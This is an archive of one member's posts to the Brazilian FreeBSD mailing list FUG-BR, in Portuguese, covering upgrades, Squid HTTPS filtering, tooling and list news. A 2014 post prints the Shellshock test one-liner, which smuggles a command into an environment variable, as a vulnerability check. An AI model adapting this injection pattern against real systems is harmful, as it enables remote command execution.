Re: [FUG-BR] Quero sair da lista

[Welkson Renny de Medeiros]

Em seg., 10 de fev. de 2020 às 19:49, Gilberto F da Silva <2458...@gmail.com>
escreveu:

> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>   Há esse link para retirar o nome da inscrição porém, há
>   meses venho tentando e a página está sempre inacessível.
>
>
Envia e-mail para freebsd-unsubscr...@fug.com.br ou acesse [1] (https não
está funcionando), informe seu e-mail e clique em "Desinscrever".

[1] http://www.fug.com.br/mailman/listinfo/freebsd

Att.,
-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OOF-TOPIC] Re: Lista

[Welkson Renny de Medeiros]

Em 19 de fevereiro de 2018 11:14, Fábio Rodrigues Ribeiro <
lis...@farribeiro.com.br> escreveu:

> Em 19-Feb-18 11:08, Welkson Renny de Medeiros escreveu:
>
>> Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro <
>> lis...@farribeiro.com.br> escreveu:
>>
>> E criaram...
>>>
>>> https://t.me/fug_br
>>>
>>> fu...@googlegroups.com
>>>
>>> Abraços.
>>>
>>>

A ideia de grupos em WhatsApp e Telegram para discussões técnicas eu acho
bem estranho. Participo de 2 grupos no Telegram, um de BSD (esse aí), e
outro de Ceph... são MUITAS mensagens, sem histórico (ou histórico
confuso), muito off-topic, etc... prefiro o old-school das listas, apesar
de não ser "real-time" como o chat.

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OOF-TOPIC] Re: Lista

[Welkson Renny de Medeiros]

Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro <
lis...@farribeiro.com.br> escreveu:

> E criaram...
>
> https://t.me/fug_br
>
> fu...@googlegroups.com
>
> Abraços.
>


Com o FUG de volta, creio não fazer sentido manter 2 listas (o histórico da
lista FUG é bastante rico).

O negócio é ficar por aqui, e tentar contribuir de alguma forma para que a
lista continue de pé (auxiliar na manutenção dos servidores, auxílio
financeiro para hospedagem da VM se for o caso, etc.).

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Lista voltou à ativa?

[Welkson Renny de Medeiros]

Em 15 de fevereiro de 2018 10:46, Eduardo Schoedler 
escreveu:

>
> >
> > Acredito que ela nunca tenha parado, apenas diminuiram as perguntas ou o
> > interesse no assunto :(
>
> Acredito que não, pois estou recebendo uma enxurrada de e-mails desde
> essa noite.
>
> --
> Eduardo Schoedler
>
>

Ficou parada por alguns meses. Problemas no mailman. Brandi explicou no
grupo do Telegram.

Vida longa ao FUG ;-)

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Automação e gerenciamento de configuração no FreeBSD

[Welkson Renny de Medeiros]

Em 15 de fevereiro de 2018 02:08, Paulo Henrique 
escreveu:

> Em 15 de fev de 2018 01:56, "Adiel de Lima Ribeiro" <
> adiel.netad...@gmail.com> escreveu:
>
> Bom dia, lista.
> De minhas pesquisas eu ví que o Chef e o Puppet não são totalmente
> compatíveis com o FreeBSD e não é possível executá-los sobre o FreeBSD.
> Sendo assim, segue minha dúvida:
> Qual ferramenta vocês utilizam para lidar com isso em seus parques de
> servidores FreeBSD?
> Obrigado.
>
> --
> Best regards;
> Adiel de Lima Ribeiro
> AWS Certified Solutions Architect
> Specialist in Linux Network Administration
> Microsoft Certified Systems Administrator
> +55 (31) 98961-5984
> http://nuvym.com/



Ansible [1] e Fabric [2] creio que funcionam bem.

[1] https://www.ansible.com/
[2] http://www.fabfile.org/

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Lista com problemas?

[Welkson Renny de Medeiros]

Amigos,

FUG está com problemas?

Outras colegas comentaram no MASOCH-L e decidi testar.

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Monitorar consumo do Link

[Welkson Renny de Medeiros]

Em 5 de maio de 2016 15:26, Enio Marconcini  escreveu:

> Olá boa tarde amigos.
> Alguém recomenda um software que me permita, não só ver o consumo atual que
> está passando no momento, mas o consumo total já trafegado,
> algo parecido que o comando "systat -ifstat" mostra, porém que me permita
> medir o que foi trafegado no dia, semanal ou mensal?
>
> Das ferramentas que eu conheço (cacti, mrtg, ntop, trafshow) não sei se
> exibem essa informação ou essa possibilidade.
>
> Att
>
>

O bandwidthd atenderia?
http://bandwidthd.sourceforge.net/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Gravação Palestra: Do meio do mato pro meio do BSD!

[Welkson Renny de Medeiros]

Em 3 de fevereiro de 2016 12:24, Jack  escreveu:

> Buenas!
>
> Se for isso, aqui: https://youtu.be/kQoCRp_Ac88?t=1773
>
> []`s
> Jack
>
>

Que massa! Parabéns garga! Motivador sua história!

Eu também vim do meio do mato (sertão do RN rsrs) e me identifiquei
bastante com sua história (ler "man" impresso, entre outros).

Abraços,

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sr. Moderador me tire da lista

[Welkson Renny de Medeiros]

Em 27 de março de 2015 15:20, Eduardo Schoedler 
escreveu:

> Em 27 de março de 2015 14:57, Ricardo Romero 
> escreveu:
>
> > Já tentei várias vezes mas não consigo.
> >
> > A página da web em https://www.fug.com.br/mailman/listinfo/freebsd pode
> > estar temporariamente indisponível ou pode ter sido movida
> permanentemente
> > para um novo endereço da web.
> > Código de erro: ERR_CONNECTION_CLOSED
>
>

Acesse usando HTTP em vez de HTTPS:
http://www.fug.com.br/mailman/listinfo/freebsd

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 20:34, Welkson Renny de Medeiros 
escreveu:

> Em 5 de março de 2015 18:18, MrBiTs  escreveu:
>
>>
>> Se você configurar o squid direito (como me parece que fez) E (e esse é
>> um grande E) colocar no mesmo .pem tanto a chave, o
>> certificado e o certificado intermediário da Startcom, sim, tudo deve
>> funcionar. Eu tenho certificados deles falando com Google,
>> Facebook e outros serviços.
>>
>>
>
> Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução.
>
> Você precisou instalar esse certificado no navegador das máquinas?
>
> Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a
> nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *.
> minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish)
> os caras instalavam um certificado wildcard no navegador do usuário.
>
> Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele
> associa o certificado ao host com uma chave que só o responsável pelo
> domínio teria acesso... o site até pode abrir em MITM, mas o navegador
> deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou
> não?
>
> Se eu estiver engando, e se você puder, indique algum material para que eu
> possa entender melhor essa solução.
>
> [1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
>
> Welkson
>
>

Complemento para meu e-mail anterior:

http://www.squid-cache.org/mail-archive/squid-users/201409/0002.html

http://security.stackexchange.com/questions/52645/legitimate-use-case-of-man-in-the-middle-attack-for-dpi

"4. Yep Certificate pinning will cause problems with this and is becoming
more common as time goes by. The way this works is that the browser knows
of a specific certificate or set of certificates that it trusts for a given
hostname, and it won't base that trust on certificates being issued by a
known CA. I'm not aware of a way past that problem".

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 18:18, MrBiTs  escreveu:

>
> Se você configurar o squid direito (como me parece que fez) E (e esse é um
> grande E) colocar no mesmo .pem tanto a chave, o
> certificado e o certificado intermediário da Startcom, sim, tudo deve
> funcionar. Eu tenho certificados deles falando com Google,
> Facebook e outros serviços.
>
>

Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução.

Você precisou instalar esse certificado no navegador das máquinas?

Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a
nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *.
minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish) os
caras instalavam um certificado wildcard no navegador do usuário.

Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele
associa o certificado ao host com uma chave que só o responsável pelo
domínio teria acesso... o site até pode abrir em MITM, mas o navegador
deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou
não?

Se eu estiver engando, e se você puder, indique algum material para que eu
possa entender melhor essa solução.

[1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 13:04, MrBiTs  escreveu:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> On 03/05/2015 12:54 PM, Renata Dias wrote:
> > Boa tarde a todos !
> >
> > Fiz várias pesquisas no Google e também na FUG com relação a este
> assunto "Squid com https". Gerei um certificado "informal" e
> > consegui configurar meu Squid para filtrar os acessos na porta 443,
> porém ainda tenho problemas com o acesso ao Google.
>
>

Posso está enganado, mas se não me engano Google usa "certificate pinning",
e você não vai conseguir acessar o serviço deles usando certificados
auto-assinados.

A saída é colocar uma exceção na regra do firewall para que a faixa de IP
do Google não seja enviada para o proxy.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 8.4

[Welkson Renny de Medeiros]

Em 24 de fevereiro de 2015 15:20, Renato Botelho 
escreveu:

> Márcio,
>
> portupgrade é concorrente do portmaster e não do pkg. O pkg você vai
> acabar usando direta ou indiretamente. Na árvore de ports atual (seja no
> 8.4 ou no 10), quando você executa um ‘make install’ em um port, ele
> instala os arquivos dentro de PORTDIR/work/stage, cria um pacote binário
> .txz e instala esse pacote usando pkg, ou seja, o pkg *sempre* será usado.
>
> Tanto o portupgrade quanto o portmaster continuam funcionando do mesmo
> jeito que sempre funcionaram até onde eu sei, e eles servem pra atualizar
> ports compilando a partir do src usando a árvore do ports.
>
> O pkg também serve para instalar pacotes binários, nesse caso é bem mais
> rápido pois não compila local, mas, em contrapartida, é menos flexível,
> pois hoje são gerados pacotes apenas compilados com as OPTIONS default.
>
> Então eu diria que, se você vai usar todos os pacotes com OPTIONS default,
> vá de pkg com pacotes binários. Se você precisa selecionar OPTIONS não
> default, aí a escolha é sua, portupgrade (que eu já não uso há muitos anos
> e não sei como anda) ou portmaster.
>
> --
> Renato Botelho
>


Garga, outro dia estava pensando em abrir uma thread para perguntar
exatamente pelas OPTIONS... maioria dos ports que instalo funcionam bem com
options default, outros não (Squid por exemplo, onde preciso especificar
qual proxy transparente pretendo usar, via pf, ipfw, etc.).

Meu server está com FreeBSD 9.1-RELEASE, e o EoL já se foi desde de
12/2014... como está em uma máquina virtual, estou pensando em clonar e
fazer testes de migração para uma versão mais atual.

Att.,

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean

[Welkson Renny de Medeiros]

2015-01-14 16:54 GMT-03:00 Fabricio Lima :

> So pra constar, caso precisem, na AWS da amazon suporta BSD 10.1 tb (desde
> nov/2012)
>
> https://aws.amazon.com/marketplace/pp/B00KSS55FY
>
> [ ]'s
> Fabricio Lima
>
>
No caso da AWS, o problema é que o suporte não é "oficial", e sim um "port"
desenvolvido pelo Perciva:
http://www.daemonology.net/freebsd-on-ec2/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean

[Welkson Renny de Medeiros]

Notícia excelente!

Welkson


-- Forwarded message --
From: Andrew Starr-Bochicchio 
Date: 2015-01-14 15:01 GMT-03:00
Subject: FreeBSD Now Available on DigitalOcean
To: freebsd-cl...@freebsd.org


Hi all,

I'm glad to be able to announce that FreeBSD 10.1 is now available for
use on DigitalOcean. This has been one of the most requested features
on our UserVoice page, so we're excited to finally bring it out.
There's more information in this blog post by Neal Shrader, a member
of our engineering team. [0]

I'm subscribed to this list, and would love to hear any feedback you
might have or answer any questions.

[0]
https://www.digitalocean.com/company/blog/presenting-freebsd-how-we-made-it-happen/

Thanks!

- Andrew Starr-Bochicchio
  Community Manager
  DigitalOcean
ᐧ
___
freebsd-cl...@freebsd.org mailing list
https://lists.freebsd.org/mailman/listinfo/freebsd-cloud
To unsubscribe, send any mail to "freebsd-cloud-unsubscr...@freebsd.org"



-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] fork do pfSense

[Welkson Renny de Medeiros]

Em 6 de janeiro de 2015 09:12, Rafael Aquino  escreveu:

>
> Bom dia a todos...
>
> Eu não conhecia esta ferramenta, e como fã do PFSense prontamente instalei
> (agora a pouco)
>
> Bom, tem que ser um fork aprovado, pois instalação e todas as features são
> iguais...
>
> Gostei da skin, que é MUITO mais bonita...
>
> Mas até o momento senti falta de um recurso vital: o gerenciador de
> pacotes...
> E também da tradução para português.
>
> No mais, parece bem estável (de novo: são os mesmos recursos do pfsense em
> um FreeBSD 10.0 p15).
>
> Mas vou explorar mais e posto minhas impressões.
>
> Abraços!!!
>
> ---
> Rafael Mentz Aquino
> LK6 Soluções em TI
>


Rafael, bom dia!

Acho que só precisa de autorização se for usar o nome pfSense.

Ou estou enganado?

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Welkson Renny de Medeiros]

Em 24 de dezembro de 2014 14:22, Fabricio Lima 
escreveu:

> eu voto no alvarenga!!
>
> [ ]'s
> Fabricio Lima
> When your hammer is C++, everything begins to look like a thumb.
>
>

Pow pessoal, a intenção era discutir "tecnicamente" o assunto! Indiferente
da linguagem do gueto, maloqueiro, culta, l33t, etc. ( vocês são
demais);

Obrigado pelas dicas Evandro.

Bem que eksffa poderia nos brindar com a última aula de BSD de 2014 =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Welkson Renny de Medeiros]

Estava vendo o twitter ontem e me deparei com esse post:
http://networkfilter.blogspot.com.br/2014/12/security-openbsd-vs-freebsd.html?m=1

No Reddit tem alguns comentários:
http://www.reddit.com/r/netsec/comments/2ph03s/security_openbsd_vs_freebsd/

Ainda estou lendo o post... mas vejo com bons olhos esses "comparativos",
pois nos mostra onde estamos errando (se é que estamos, pois muitas das
tecnologias apresentadas são "novidades" pra mim =).

flames > /dev/null

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Servidor de música

[Welkson Renny de Medeiros]

Em 7 de dezembro de 2014 19:44, Thiago Gomes 
escreveu:

> Galera,
>
> Gostaria de saber como implemento um servidor de música para uma loja. A
> empresa  tem várias filiais ligada via fibra, ele deseja usando o Windows
> player ou até mesmo o browser fazer tocar essas músicas.
>
> Thiago.
>
>

ICECast não ajudaria?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] CEO do Whatsapp doa 1 milhão para a FreeBSDFundation

[Welkson Renny de Medeiros]

http://freebsdfoundation.blogspot.com.br/2014/11/freebsd-foundation-announces-generous.html?m=1

Netflix poderia fazer o mesmo ;p

Welkson
* usando smartphone
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Ferramentas para análise de performance

[Welkson Renny de Medeiros]

Esse Brendan Greg trabalha na Netflix, e lá usa muito FreeBSD.

No site dele tem vários slides legais sobre performance em *unix.

No link abaixo tem as sugestões de ferramentas:
Now with a BSD kernel :-) FreeBSD perf observ tools for @MeetBSDCA
http://twitter.com/brendangregg/status/525707800584810496/photo/1

O site dele é esse:
http://brendangregg.com

Welkson
PGP: D092C683
* usando smartphone
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Falha no BASH (possível exploração remota)

[Welkson Renny de Medeiros]

Dia.

Já testaram?

welkson@fw ~ % env x='() { :;}; echo vulnerable'  bash -c "echo this is a
test"
vulnerable
this is a test

Mais detalhes:
http://portaudit.freebsd.org/71ad81da-4414-11e4-a33e-3c970e169bc2.html
https://access.redhat.com/articles/1200223
https://marc.info/?l=oss-security&m=141157106132018&w=2

Migrei a pouco tempo para o "pkg", e estou apanhando quando tento
atualizar com pkg install bash, o treco me oferece atualização de um monte
de PHP antigo (estou usando 5.5 instalado via /usr/ports/lang/php55* e o
pkg me oferece atualização para o 54, ou seja, mais velho). Preciso parar e
entender esse tal pkg =)

-- 
Welkson
PGP: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Erro sonewconn

[Welkson Renny de Medeiros]

Em 27 de agosto de 2014 16:29, Jorge Petry - BSD 
escreveu:

>
> Em 26/08/2014 15:33, Luiz Otavio O Souza escreveu:
>
>  On 26 August 2014 10:55, Jorge Petry - BSD wrote:
>>
>>> Bom dia pessoal.
>>>
>>> Alguém ja passou por esse tipo de erro?
>>> Estão aparecendo nos logs e dmesg. Possuo 02 Servers com Freebsd
>>> 10-RELEASE
>>> rodando jails e aparece nos 2.
>>>
>>>
>>> sonewconn: pcb 0xf80265003dc8: Listen queue overflow: 151 already in
>>> queue awaiting acceptance
>>> sonewconn: pcb 0xf80177664188: Listen queue overflow: 8 already in
>>> queue
>>>
>>>

Uma curiosidade... você aplicou essa regra no sysctl do host ou do jail?

Como jail é um ambiente isolado, provavelmente tem seu próprio sysctl.

Fazendo uma analogia com virtualização, o que quero saber é se você aplicou
o sysctl no HOST ou no GUEST.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 -> 10.0

[Welkson Renny de Medeiros]

Em 7 de agosto de 2014 14:32, Paulo Henrique - BSDs Brasil <
paulo.rd...@bsd.com.br> escreveu:

> Atualizei a minha estação de trabalho no final de semana da versão 9.2
> para a 10 STABLE e não tive nenhum problema no processo, contudo ja havia
> migrado para o pkg antes da atualização.
> Os passos foram os seguintes :
>
> Atualizar o subversion
> Remover o /usr/src
>

Paulo, estou com uma dúvida, você removeu o /usr/src e já fez o make
buildworld? Não tem um svn checkout antes desse make buildworld?



> make buildworld ( é requerimento para qualquer troca de major release)
> make buildkernel KERNCONF=MYKERNEL
> make installkernel KERNCONF=MYKERNEL
> mergemaster -iFp
> reboot
> make installworld
> mergemaster -Fp
> reboot
> make delete-old-lib
> make delete-old-dir
> reboot
>
>
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF - Pfsense] Vouchers Captivel Portal

[Welkson Renny de Medeiros]

Em 4 de agosto de 2014 15:47, Deny Santos  escreveu:

> Boa tarde , gostaria de ver se alguém conhece alguma forma de gerar os
> vouchers do pfsense sem ter que logar nele com usuario administrador ,
> pergunto pois preciso que uma recepcionista fique gerando os tickets, ja vi
> o FreeRadius que tem como fazer também pois ele salvaria a base dele no
> mysql e depois eu pegaria com um php tranquilamente .
>
> Alguma sugestão ?
>
> Obrigado
>
>

Um amigo tempos atrás me fez essa pergunta, fiz algumas pesquisas rápidas e
encontrei isso:
http://www.pfsensevp.portalavis.net/
https://github.com/vatesfr/selkie
https://github.com/jpardobl/pfsense_vouchers_rest

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 -> 10.0

[Welkson Renny de Medeiros]

Em 4 de agosto de 2014 14:24, Edinilson - ATINET 
escreveu:

> Eu sempre utilizo os metodos descritos aqui:
>  http://www.bsdnow.tv/tutorials/stable-current
>
> E, na parte do kernel, dificilmente tenho maiores problemas.
>
> O que SEMPRE tenho problemas sao com os ports. O perl e suas bibliotecas é
> um bom exemplo.
> Do 9 para o 9.3 eu tive problemas TAMBEM com o smokeping, esteja preparado.
>
> Edinilson
>
>

Excelente link Edinilson. Obrigado!

Esse BSD que pretendo atualizar fica um pouco distante, estava pensando em
fazer remotamente (coragem está pouca :p).

O bom é que esse BSD está virtualizado (ESXi 5.1), posso fazer um snapshot
antes de tentar atualizar, e qualquer bronca dar um revert.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 -> 10.0

[Welkson Renny de Medeiros]

Em 30 de julho de 2014 08:41, Marcelo da Silva 
escreveu:

> bom dia.
>
> tenho uma instalacao com versao 9.0 do  FreeBSD
>
> gostaria de fazer upgrade para versao 10 .
>
> a instalacao é simples, so mysql55 php e apache.
>
> qual o procedimento correto ?
> principalmente que agora usa svn e eu ainda do meio confuso com isso .
>


Considerando o EoL estou pensando em migrar meu 9 para 9.3:
http://www.freebsd.org/security/

Sua pergunta foi bem pertinente Marcelo. Apesar de gostar (e usar) bastante
o Google, existe várias formas de atualizar o BSD (svn, freebsd-update,
etc.), e não custa pedir opinião aos amigos mais experientes.

O meu tem bastante serviço rodando (sei que não é uma boa prática)... estou
criando "coragem" de fazer o upgrade =)
Att.,

-- 
Welkson
PGP: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] - Lista/Site de registro de malwares

[Welkson Renny de Medeiros]

Em 16 de julho de 2014 14:29, Ricardo Tweeg  escreveu:

>
>
> Boa tarde a todos,
>
> Desde já peço desculpas pelo assunto ser off-topic.
>
> Gostaria de saber se alguém da lista poderia me indicar algumas
> listas/sites gratuitos de registros de malwares.
> Seria a mesma coisa que temos hoje em dia com os spamns, onde listas/sites
> registram os emails, domínios e Ip´s que fazem spamns.
> No momento só encontrei as listas/sites cobertos pelo site www.abuse.ch.
>
> Caso conheçam mais alguns que fosse de qualidade e free, ficaria grato
> pela ajuda.
>
> Abraços
>
>

Tempos atrás usei essa:
http://www.malware.com.br/

Não sei se continua sendo atualizada.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFFTOPIC] Indicação de colocation

[Welkson Renny de Medeiros]

Em 26 de maio de 2014 13:10, Celso Viana  escreveu:

> Tem que ser BSD? Se sim, o rootbsd.com parece bom.
>
> Amazon AWS tem BSD (FreeBSD)?
>
> --
> Celso Vianna
> BSD User: 51318
> http://www.bsdcounter.org



Oficialmente não.

Mas algumas pessoas usam as imagens que o Perciva disponibiliza:
http://www.daemonology.net/freebsd-on-ec2/

O tarsnap.com usa FreeBSD e está hospedado na Amazon.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [GTER] pfSense - not open source anymore

[Welkson Renny de Medeiros]

Em 22 de maio de 2014 11:04, Christopher Giese escreveu:

>
> Em 22/05/2014 10:50, Renato Botelho escreveu:
> > 2014-05-22 10:40 GMT-03:00 Lucas Dias :
> >> Em 22 de maio de 2014 10:13, Nicolas Wildner 
> escreveu:
> >>
> >>> O problema é o seguinte
> >>>
> >>> 1 - pfSense é uma marca registrada da Electric Sheep Fencing.
> >>> 2 - As pessoas começaram a fazer forks do projeto, sem ao menos
> >>> ter a decência de mudar o nome do fork com relação ao original
> >>> 3 - pfSense remove suas ferramentas de "buildar" pfSense
> >>> 4 - Lançam a informação de que haverá uma versão comercial e
> >>> outra "community"(não sei se opensource ou freeware)
>


Em mais de um post vi o pessoal comentando que o FreeBSD também terá um CLA
[1], parecido com o pfSense [2]:

[1] https://forum.pfsense.org/index.php?topic=77038.0("You should
probably be aware that a CLA is coming to FreeBSD as well.")
[2] https://portal.pfsense.org/members/signup/ICLA

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPPIC] Tentando acertar um esquema de cores no editor vim

[Welkson Renny de Medeiros]

Em 19/05/2014 18:10, "Nicolas Wildner"  escreveu:
>
> - Mensagem original -
> > De: "Renato Botelho" 
> > Para: "Lista Brasileira de Discussão sobre FreeBSD (FUG-BR)" <
freebsd@fug.com.br>
> > Enviadas: Domingo, 18 de Maio de 2014 7:55:43
> > Assunto: Re: [FUG-BR] [OFF-TOPPIC] Tentando acertar um esquema de cores
noeditor vim
> >
> > On Saturday, May 17, 2014 05:21:31 PM Eduardo Lemos de Sa wrote:
> > > Caríssimos
> > >
> > >
> > > Depois de muito tempo usando o vim, resolvi melhorar um pouco as
> > > condições
> > > de trabalho tentando acertar um esquema de cores. Meu terminal é de
> > > fundo
> > > escuro e, no esquema que eu estava usando (como não o settei no
> > > .vimrc,
> > > desconfio que era o default) os comentários que apareciam nos
> > > scripts eram
> > > todos azul-escuro, o que tornava a tarefa de lê-los bastante
> > > difícil. Eu
> > > andei vasculhando
> > >
http://stackoverflow.com/questions/7331940/how-to-get-the-list-of-all-instal
> > > led-color-schemes-in-vime vi como se faz para mudar o esquema. O
> > > problema é
> > > que, com poucas
> > > exceções, todos teimam em escrever algo escuro (pode ser os
> > > comentários,
> > > nomes de variáveis, comandos) contra o fundo de tela escuro. O
> > > melhor que
> > > eu encontrei foi um "colorscheme pablo", mas ele está longe de ser
> > > o que
> > > permite uma melhor visualização. Por favor, dentre vocês, usuários
> > > do vim,
> > > haveria alguma sugestão?
> > >
> > > Obrigado pela atenção
> > >
> > >
> > > Eduardo
> >
> > Um dos temas mais famosos pra vim (e também pra terminal) é o
> > solarized...
> >
> > http://ethanschoonover.com/solarized
> >
> > --
> > Renato Botelho
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
> Buenas,
>
> Pra labuta diária eu uso o "colorscheme desert" que tem os
> comentários com azul claro ao invés daquele treco padrão que
> fode com a visão do cara.
>
> Com fundo preto fica bom o suficiente pra não cansar muito.
>
> Nícolas Wildner
> Analista de Infraestrutura de TI - TBL BGV
> Transportes Bertolini Ltda.
> www.tbl.com.br
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Uso o Solarized.

Não esquecendo de definir o termcolors pra 256.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?

[Welkson Renny de Medeiros]

Em 15 de abril de 2014 13:17, Patrick Tracanelli <
eks...@freebsdbrasil.com.br> escreveu:

>
>
> On 15/04/2014, at 12:18, Renato Botelho  wrote:
>
> > On Ter, 2014-04-15 at 11:50 -0300, Welkson Renny de Medeiros wrote:
> >> Pessoal,
> >>
> >> Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é
> o
> >> MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de "fork"?
> >>
> >> ". as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
> >> you are fine.  That's the only place I know of an OpenSSH hole. "
> >>
> >> flames > /dev/null (saudoso Irado =)
> >
> > Sim, é o mesmo. O Theo Deraadt gosta de ser polêmico (no mesmo estilo do
> > linus torvalds). O alvo da vez é o FreeBSD e a IETF (que não de um
> > número de protocolo pro CARP e fez ele ficar bravinho). :)
> >
> > Se eu fosse você nem esquentava a cabeça com as coisas que ele fala,
> > amanhã ele acorda irritado com o linux e muda o foco novamente.
>
> Olha e pelo pouco que se conhece do Theo, o FreeBSD vai entrar de novo na
> mira dele por causa do CARP no FreeBSD 10, que ficou tão “melhor” que o
> DfBSD está dispensando o carp existente pra usar o do FreeBSD; os caras do
> uCARP (que são dev OpenBSD) estão estudando se da pra fazer o ficar tão
> inerente a interface física como ficou no FreeBSD de forma portável.
> [crop]



